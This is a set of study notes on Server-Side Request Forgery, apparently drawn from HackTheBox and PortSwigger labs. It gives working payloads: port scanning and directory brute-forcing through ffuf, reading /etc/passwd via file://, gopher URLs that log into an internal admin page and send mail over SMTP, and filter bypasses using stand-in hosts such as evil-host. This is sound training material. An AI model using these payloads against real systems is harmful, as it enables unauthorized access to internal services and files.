## Table of Contents

1. [The basics](#1-the-basics)  
2. [Identifying SSRF](#2-identifying-ssrf)  
3. [Enumerating the System](#3-enumerating-the-system)  
4. [Exploiting SSRF](#4-exploiting-ssrf)  
   - [Accessing Restricted Endpoints](#accessing-restricted-endpoints)  
   - [Local File Inclusion (LFI)](#local-file-inclusion-lfi)  
   - [The gopher Protocol](#the-gopher-protocol)  
5. [Circumventing common SSRF defenses (PSG)](#5-circumventing-common-ssrf-defenses-psg)  
   - [SSRF with blacklist-based input filters](#ssrf-with-blacklist-based-input-filters)  
   - [SSRF with whitelist-based input filters](#ssrf-with-whitelist-based-input-filters)  
   - [Bypassing SSRF filters via open redirection](#bypassing-ssrf-filters-via-open-redirection)  
6. [Blind SSRF](#6-blind-ssrf)  
   - [Identifying Blind SSRF](#identifying-blind-ssrf)  
   - [Exploiting Blind SSRF](#exploiting-blind-ssrf)



# Cheatsheet: https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet

# 1. The basics

**Server-Side Request Forgery (SSRF)** is a vulnerability where an attacker can manipulate a web application into sending unauthorized requests from the server. This vulnerability often occurs when an application makes HTTP requests to other servers based on user input. Successful exploitation of SSRF can enable an attacker to access internal systems, bypass firewalls, and retrieve sensitive information.

Suppose a web server fetches remote resources based on user input. In that case, an attacker might be able to coerce the server into making requests to arbitrary URLs supplied by the attacker, i.e., the web server is vulnerable to SSRF. 

In a typical SSRF attack, the attacker might cause the server to make a connection to internal-only services within the organization's infrastructure. In other cases, they may be able to force the server to connect to arbitrary external systems. This could leak sensitive data, such as authorization credentials.

Furthermore, if the web application relies on a user-supplied URL scheme or protocol, an attacker might be able to cause even further undesired behavior by manipulating the URL scheme. For instance, the following URL schemes are commonly used in the exploitation of SSRF vulnerabilities:

* `http://` and `https://`: These URL schemes fetch content via HTTP/S requests. An attacker might use this in the exploitation of SSRF vulnerabilities to bypass WAFs, access restricted endpoints, or access endpoints in the internal network.
* `file://`: This URL scheme reads a file from the local file system. An attacker might use this in the exploitation of SSRF vulnerabilities to read local files on the web server (LFI).
* `gopher://`: This protocol can send arbitrary bytes to the specified address. An attacker might use this in the exploitation of SSRF vulnerabilities to send HTTP POST requests with arbitrary payloads or communicate with other services such as SMTP servers or databases.

# 2. Identifying SSRF

Assuming that we found a website has a `functionality` to `schedule appointments`. After checking the availability of a date, we can observe the following request in Burp: `dateServer=https://dateserver.htps/availability.php&date=2024-01-01`. As we see, the request contains `our chosen date` and a `URL` in the parameter dateserver. This indicates that the web server `fetches` the availability information from a `separate system` determined by the `URL` passed in this POST parameter.

To confirm an `SSRF` vulnerability, we can supply a `URL` pointing to our system to the web application:

`dateServer=https://OUR-IP/ssrf&date=2024-01-01`

In a `netcat` listener, we can receive a connection, thus confirming SSRF:

```
$ nc -lnvp 8000

listening on [any] 8000 ...
connect to [172.17.0.1] from (UNKNOWN) [172.17.0.2] 38782
GET /ssrf HTTP/1.1
Host: 172.17.0.1:8000
Accept: */*
```

To determine whether the HTTP response reflects the SSRF response to us, we can point the web application to itself by providing the URL `http://127.0.0.1/index.php` in the Burp requester. And on the response, it might contains the web application's HTML code.

# 3. Enumerating the System

We can use the SSRF vulnerability to conduct a port scan of the system to enumerate running services. To achieve this, we need to be able to infer whether a port is open or not from the response to our SSRF payload. 

If we supply a port that we assume is `closed` (such as `81`): `http://127.0.0.1:81/&date=2024-01-01`, the response contains an error message: `Error: Failed to connect to ...`

This enables us to conduct an internal port scan of the web server through the SSRF vulnerability. We can do this using a fuzzer like `ffuf`:

```
$ seq 1 10000 > ports.txt
$ ffuf -w ./ports.txt -u http://172.17.0.2/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://127.0.0.1:FUZZ/&date=2024-01-01" -fr "Failed to connect to"

<SNIP>

[Status: 200, Size: 45, Words: 7, Lines: 1, Duration: 0ms]
    * FUZZ: 3306
[Status: 200, Size: 8285, Words: 2151, Lines: 158, Duration: 338ms]
    * FUZZ: 80
```

# 4. Exploiting SSRF

## Accessing Restricted Endpoints

From the example above, assuming we found a URL: `http://dateserver.htps:<PORT>/`. However, when we add this domain to our `hosts file` and attempt to `access` it through browser, we are unable to do so because of `Erorr 403 Forbidden` response.

However, we can access and enumerate the domain through the `SSRF` vulnerability. For instance, we can conduct a directory brute-force attack to enumerate additional endpoints using `ffuf`. To also filter out any HTTP 403 responses, we will filter our results based on the string `Server at dateserver.htb Port 80`, which is contained in default Apache error pages. Since the web application runs PHP, we will specify the `.php` extension:

```
$ ffuf -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -u http://172.17.0.2/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://dateserver.htb/FUZZ.php&date=2024-01-01" -fr "Server at dateserver.htb Port 80"

<SNIP>

[Status: 200, Size: 361, Words: 55, Lines: 16, Duration: 3872ms]
    * FUZZ: admin
[Status: 200, Size: 11, Words: 1, Lines: 1, Duration: 6ms]
    * FUZZ: availability
```

## Local File Inclusion (LFI)

We can manipulate the `URL scheme` to provoke further unexpected behavior. Since the URL scheme is part of the URL supplied to the web application, let us attempt to read local files from the file system using the `file://` URL scheme. We can achieve this by supplying the URL `file:///etc/passwd`

`dateServer=file:///etc/passwd&date=2024-01-01`

## The gopher Protocol

As we have seen previously, we can use `SSRF` to access restricted internal `endpoints`. However, we are restricted to `GET` requests as there is no way to send a `POST` request with the `http://` URL scheme. For instance, let us consider a different version of the previous web application. Assuming we identified the internal endpoint `/admin.php` just like before, however, this time the response looks like this:

```
...
<SNIP>
...
<h4> Please login </h4>
<forn action="/admin.php" method="post">
<input type="adminpw" name="adminpw" placeholder="Password" required>
<input type="submit" value="Login">
</form>
...
<SNIP>
...
```

As we can see, the admin endpoint is protected by a login prompt. From the HTML form, we can deduce that we need to send a POST request to `/admin.php` containing the password in the adminpw POST parameter. However, there is no way to send this POST request using the `http://` URL scheme.

Instead, we can use the `gopher` URL scheme to send arbitrary bytes to a TCP socket. This protocol enables us to create a POST request by building the HTTP request ourselves.

Assuming we want to try common weak passwords, such as `admin`, we can send the following POST request:

```
POST /admin.php HTTP/1.1
Host: dateserver.htb
Content-Length: 13
Content-Type: application/x-www-form-urlencoded

adminpw=admin
```

We need to URL-encode all special characters to construct a valid `gopher` URL from this. In particular, spaces (`%20`) and newlines (`%0D%0A`) must be URL-encoded. Afterward, we need to prefix the data with the gopher URL scheme, the target host and port, and an underscore, resulting in the following gopher URL:

`gopher://dateserver.htb:80/_POST%20/admin.php%20HTTP%2F1.1%0D%0AHost:%20dateserver.htb%0D%0AContent-Length:%2013%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0A%0D%0Aadminpw%3Dadmin`

Our specified bytes are sent to the target when the web application processes this URL. Since we carefully chose the bytes to represent a valid POST request, the internal web server accepts our POST request and responds accordingly. However, since we are sending our URL within the HTTP POST parameter `dateserver`, which itself is `URL-encoded`, we need to `URL-encode the entire URL again` to ensure the correct format of the URL after the web server accepts it. Otherwise, we will get a `Malformed` URL error. After URL encoding the entire gopher URL one more time, we can finally send the following request:

```
POST /index.php HTTP/1.1
Host: 172.17.0.2
Content-Length: 265
Content-Type: application/x-www-form-urlencoded

dateserver=gopher%3a//dateserver.htb%3a80/_POST%2520/admin.php%2520HTTP%252F1.1%250D%250AHost%3a%2520dateserver.htb%250D%250AContent-Length%3a%252013%250D%250AContent-Type%3a%2520application/x-www-form-urlencoded%250D%250A%250D%250Aadminpw%253Dadmin&date=2024-01-01
```

We can use the gopher protocol to interact with many internal services, not just HTTP servers. Imagine a scenario where we identify, through an SSRF vulnerability, that TCP port 25 is open locally. This is the standard port for SMTP servers. We can use Gopher to interact with this internal SMTP server as well. However, constructing syntactically and semantically correct gopher URLs can take time and effort. Thus, we will utilize the tool `Gopherus` to generate gopher URLs for us. The following services are supported:

* MySQL
* PostgreSQL
* FastCGI
* Redis
* SMTP
* Zabbix
* pymemcache
* rbmemcache
* phpmemcache
* dmpmemcache

To run the tool, we need a valid Python2 installation. Afterward, we can run the tool by executing the Python script downloaded from the GitHub repository:

Let us generate a valid SMTP URL by supplying the corresponding argument. The tool asks us to input details about the email we intend to send. Afterward, we are given a valid gopher URL that we can use in our SSRF exploitation:

```
$ python2.7 gopherus.py --exploit smtp

  ________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/
\    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \
 \______  /\____/|   __/|___|  /\___  >__|  |____//____  >
        \/       |__|        \/     \/                 \/

                author: $_SpyD3r_$


Give Details to send mail: 

Mail from :  attacker@academy.htb
Mail To :  victim@academy.htb
Subject :  HelloWorld
Message :  Hello from SSRF!

Your gopher link is ready to send Mail: 

gopher://127.0.0.1:25/_MAIL%20FROM:attacker%40academy.htb%0ARCPT%20To:victim%40academy.htb%0ADATA%0AFrom:attacker%40academy.htb%0ASubject:HelloWorld%0AMessage:Hello%20from%20SSRF%21%0A.

-----------Made-by-SpyD3r-----------
```

# 5. Circumventing common SSRF defenses (PSG)

## SSRF with blacklist-based input filters

Some applications `block` input containing hostnames like `127.0.0.1` and `localhost`, or sensitive URLs like `/admin`. In this situation, we can often circumvent the filter using the following techniques:
- Use an `alternative IP representation` of 127.0.0.1, such as Decimal: `2130706433`, Octal: `0177.0.0.1`, Hexadecimal: `0x7f000001`, `017700000001`, or Mixed Notation: `127.1`. (For more, just gg/chatgpt search)
- Register your own domain name that resolves to 127.0.0.1. You can use `spoofed.burpcollaborator.net` for this purpose.
- `Obfuscate` blocked strings using URL encoding or case variation.
- Provide a URL that you control, which redirects to the target URL. Try using different redirect codes, as well as different protocols for the target URL. For example, switching from an `http:` to `https:` URL during the redirect has been shown to bypass some anti-SSRF filters.

## SSRF with whitelist-based input filters

Some applications only allow inputs that match, a whitelist of permitted values. The filter may look for a match at the beginning of the input, or contained within in it. You may be able to bypass this filter by exploiting inconsistencies in URL parsing.

The URL specification contains a number of features that are likely to be overlooked when URLs implement ad-hoc parsing and validation using this method:
- Embed credentials in a URL before the hostname, using the `@` character: `https://expected-host:fakepassword@evil-host`.
- Use the `#` character to indicate a URL fragment: `https://evil-host#expected-host`.
- Leverage the DNS naming hierarchy to place required input into a fully-qualified DNS name that you control: `https://expected-host.evil-host`.
- You can `URL-encode characters` to confuse the URL-parsing code. This is particularly useful if the code that implements the filter handles URL-encoded characters differently than the code that performs the back-end HTTP request.
- You can also try `double-encoding characters`; some servers recursively URL-decode the input they receive, which can lead to further discrepancies.
- **`Use combinations of these techniques together step by step`**.

**Note:**
> - Original url: `http://something.ofsomething.net`
> - Add cred: `http://testusername@something.ofsomething.net`
> - Add `#`: `http://testusername#@something.ofsomething.net`, `http://testusername%2523@something.ofsomething.net`
> - `http://evilhost%2523@stock.weliketoshop.net/...directory...`

## Bypassing SSRF filters via open redirection

It is sometimes possible to bypass filter-based defenses by exploiting an `open redirection vulnerability`. (Its only possible if the web implement this function some where in the web. Usally not hard to find).

If the user-submitted URL is `strictly validated` to prevent malicious exploitation of the SSRF behavior. However, the application whose URLs are `allowed contains an open redirection` vulnerability. Provided the `API used to make the back-end HTTP request supports redirections`, you can construct a URL that satisfies the filter and results in a redirected request to the desired back-end target.

For example, the application has a function that contains an open redirection vulnerability in which the following URL:

`/product/nextProduct?currentProductId=6&path=http://evil-user.net` 

returns a redirection to:

`http://evil-user.net`

This function redirect you from current location to previous or next location. You can leverage the open redirection vulnerability to bypass the URL filter, and exploit the SSRF vulnerability as follows:

```
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://weliketoshop.net/product/nextProduct?currentProductId=6&path=http://192.168.0.68/admin
```

(copy from redirec function and paste in vuln function)

This SSRF exploit works because the application first validates that the supplied `stockAPI` URL is on an allowed domain, which it is. The application then requests the supplied URL, which triggers the open redirection. It follows the redirection, and makes a request to the internal URL of the attacker's choosing.

# 6. Blind SSRF

In many real-world SSRF vulnerabilities, responses aren't displayed to attackers. These "blind" SSRF vulnerabilities have significantly lower impact because exploitation vectors that rely on inspecting responses are unavailable, severely restricting attack possibilities.

Blind SSRF vulnerabilities occur if you can cause an application to issue a back-end HTTP request to a supplied URL, but the response from the back-end request is not returned in the application's front-end response.

Blind SSRF is harder to exploit but sometimes leads to full remote code execution on the server or other back-end components.

## Identifying Blind SSRF

**Finding Hidden SSRF Attack Surface**

Many SSRF vulnerabilities are obvious when applications use full URLs in parameters. Others require deeper analysis:

**Partial URLs in requests**
Applications sometimes use only hostnames or URL fragments in parameters, incorporating them server-side into complete URLs. While the attack surface may be apparent, exploitation is limited since you don't control the entire requested URL.

**URLs within data formats**
Some data formats (like XML) allow embedded URLs that parsers may request. Applications accepting XML data can be vulnerable to both XXE injection and SSRF via XXE.

**SSRF via Referer header**
Analytics software often logs and visits URLs from Referer headers to analyze referring sites and anchor text, creating an attack surface for SSRF vulnerabilities.

**Example:**
The sample web application behaves just like in the previous section. We can confirm the SSRF vulnerability just like we did before by supplying a URL to a system under our control and setting up a `netcat` listener:

```
$ nc -lnvp 8000

listening on [any] 8000 ...
connect to [172.17.0.1] from (UNKNOWN) [172.17.0.2] 32928
GET /index.php HTTP/1.1
Host: 172.17.0.1:8000
Accept: */*
```

However, if we attempt to point the web application to itself, we can observe that the response `does not` contain the HTML response of the coerced request; instead, it simply message and lets us know that the date is unavailable (normal function of the web). Therefore, this is a blind SSRF vulnerability:

## Exploiting Blind SSRF

Exploiting blind SSRF vulnerabilities is generally severely limited compared to non-blind SSRF vulnerabilities. However, depending on the web application's behavior, we might still be able to conduct a (restricted) local port scan of the system, provided the response differs for open and closed ports. 

For example, we will first try with URL that we know is not exist: `http://127.0.0.1:81/&date=2024-01-01`. The website response with `erorr handler` like an message: `Something went wrong!`.

However, if a `port is open`, the website will responds with a valid HTTP response and function as normal by a message: `Date is unavailable, ...`

**Notice** that, depending on how the web application catches unexpected errors, we might be `unable` to `identify running services` that do `not respond` with valid HTTP responses.

Furthermore, while we `cannot read local files` like before, we can use the same technique to identify existing files on the filesystem. That is because the `error message` is different for `existing` and `non-existing files`, just like it differs for open and closed ports.


















